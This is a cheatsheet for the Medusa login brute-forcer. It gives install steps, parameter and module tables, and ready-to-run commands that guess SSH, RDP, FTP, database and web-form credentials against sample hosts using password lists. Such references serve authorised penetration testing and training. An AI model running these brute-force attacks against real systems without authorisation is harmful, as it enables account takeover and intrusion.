Medusa Cheatsheet

Medusa is a fast, massively parallel, and modular login brute-forcer designed to support a wide array of services that allow remote authentication.

Installation

sudo apt-get -y update
sudo apt-get -y install medusa

Command Syntax

medusa [target_options] [credential_options] -M module [module_options]

Parameters

Parameter	Explanation	Usage Example
`-h HOST`	Target: Single hostname or IP address	`medusa -h 192.168.1.10 ...`
`-H FILE`	Target: File containing list of targets	`medusa -H targets.txt ...`
`-u USERNAME`	Username: Single username	`medusa -u admin ...`
`-U FILE`	Username: File containing usernames	`medusa -U usernames.txt ...`
`-p PASSWORD`	Password: Single password	`medusa -p password123 ...`
`-P FILE`	Password: File containing passwords	`medusa -P passwords.txt ...`
`-M MODULE`	Module: Specific module to use	`medusa -M ssh ...`
`-m "OPTION"`	Module options: Additional parameters for module	`medusa -M http -m "POST /login.php..."`
`-t TASKS`	Tasks: Number of parallel login attempts	`medusa -t 4 ...`
`-f`	Fast mode: Stop after first success on current host	`medusa -f ...`
`-F`	Fast mode: Stop after first success on any host	`medusa -F ...`
`-n PORT`	Port: Specify non-default port	`medusa -n 2222 ...`
`-v LEVEL`	Verbose: Detailed output (0-6)	`medusa -v 4 ...`
`-e ns`	Empty/Default: Check empty (n) and same as username (s)	`medusa -e ns ...`

Modules

Module	Service/Protocol	Description	Usage Example
`ftp`	File Transfer Protocol	Brute-force FTP login credentials	`medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt`
`http`	Hypertext Transfer Protocol	Brute-force HTTP login forms (GET/POST)	`medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^`
`imap`	Internet Message Access Protocol	Brute-force IMAP logins for email servers	`medusa -M imap -h mail.example.com -U users.txt -P passwords.txt`
`mysql`	MySQL Database	Brute-force MySQL database credentials	`medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt`
`pop3`	Post Office Protocol 3	Brute-force POP3 logins for email retrieval	`medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt`
`rdp`	Remote Desktop Protocol	Brute-force RDP logins for Windows remote desktop	`medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt`
`ssh`	Secure Shell (SSH)	Brute-force SSH logins for secure remote access	`medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt`
`svn`	Subversion (SVN)	Brute-force Subversion repositories	`medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt`
`telnet`	Telnet Protocol	Brute-force Telnet services	`medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt`
`vnc`	Virtual Network Computing	Brute-force VNC login credentials	`medusa -M vnc -h 192.168.1.100 -P passwords.txt`
`web-form`	Web Login Forms	Brute-force login forms using HTTP POST	`medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid"`

Useful Examples

SSH Brute-Force Attack

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

Multiple Web Servers with Basic HTTP Authentication

medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET

Test for Empty or Default Passwords

medusa -h 10.0.0.5 -U usernames.txt -e ns -M ssh

HTTP POST Form Attack

medusa -M http -h www.example.com -U users.txt -P passwords.txt -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^"

Fast Mode (Stop on First Success)

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -f

Custom Port SSH Attack

medusa -h 192.168.1.100 -n 2222 -U usernames.txt -P passwords.txt -M ssh

Verbose Output

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -v 4

Parallel Tasks

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -t 8

Keyboard shortcuts

notebook